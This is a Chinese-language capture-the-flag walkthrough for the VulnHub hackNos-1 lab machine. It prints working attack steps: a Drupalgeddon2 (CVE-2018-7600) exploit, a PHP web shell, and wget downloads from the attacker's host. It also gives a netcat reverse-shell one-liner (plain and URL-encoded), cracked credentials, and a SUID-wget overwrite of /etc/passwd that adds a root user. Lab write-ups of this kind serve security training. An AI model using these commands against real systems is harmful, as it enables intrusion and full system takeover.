https://download.vulnhub.com/hacknos/Os-hackNos-1.ova??? #靶機下載地址

題目：要找到兩個flag????????user.txt????????root.txt

文件打開

改為NAT

vuln-hub-OS-HACKNOS-1靶機檢測不到IP地址

重啟靶機

按住shift

按下鍵盤字母"E"鍵

將圖中ro修改成rw signie init=/bin/bash

修改完成后按Ctrl+x鍵進入bash

可以看到當前即是root用戶，可以排查網卡啟動失敗的原因

先查看當前網卡信息ip a命令

上圖可以看到當前網卡ens33沒有獲取到有效的IP地址

vim /etc/network/interfacers

修改為正確網卡名稱

注：Redhat、centos系統配置文件有所差異vim /etc/sysconfig/network-scripts/ifcfg-eth0

/etc/init.d/networking restart

再ip a查看

開始實踐

主機發現

sn和sP一樣

推薦使用arp-scan -l

確定為131

掃描主機開放端口

也可以使用Windows工具

訪問80

目錄掃描

gobuster dir -u http://192.168.62.131/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt

dirsearch -u http://192.168.62.131/

dirb http://192.168.62.131/

訪問掃描的目錄

使用插件可以查看到cms版本

也可以訪問

http://192.168.62.131/drupal/CHANGELOG.txt

EXP地址：https://github.com/pimps/CVE-2018-7600

git clone https://github.com/pimps/CVE-2018-7600.git

達到RCE效果了

上傳一句話木馬

<?php system($_POST['cmd']);?>

?????? #這個馬不能連接蟻劍

python開啟http服務

在哪個文件夾開 默認顯示的就是哪個文件夾下的內容

我這邊顯示有點文字錯位

python drupa7-CVE-2018-7600.py http://192.168.62.131/drupal/ -c "wget http://192.168.62.129/shell.php"

可以ls查看是否上傳成功

測試

nc反彈shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.62.129 6666 >/tmp/f

url編碼

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20192.168.62.129%206666%20%3E%2Ftmp%2Ff

反彈成功

查看一下文件

解密

獲得賬號密碼

james:Hacker@4514

#但是后期沒什么用

創建出一個交互性shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

如果出現了報錯

單引號用英文

但是james登錄不上

嘗試提權 suid

需要搜索到帶有s的文件，開始查找 find / -perm -u=s -type f 2>/dev/null

發現wget具有suid權限，而且普通用戶可以執行，那么可以通過下載目標靶機上的passwd文件，然后添加一個有root權限的用戶到passwd文件中，然后使用wget -O將內容重定向到目標靶機的/etc/passwd中

通過OpenSSL passwd生成一個新的用戶yezi

構造一下yezi用戶的 /etc/passwd的內容

python drupa7-CVE-2018-7600.py http://192.168.62.131/drupal/ -c "wget http://192.168.62.129/passwd -O /etc/passwd"

也可以追加一行

追加到最后一行：

echo 'yezi: $1$yezi$ci.TeKqToxOQErv1R4jQ30:0:0:root:/root:/bin/bash' >> passwd

提權?????? （前面做的步驟意義其實就是新增用戶 將用戶提升為root權限）

獲取flag

1：

2：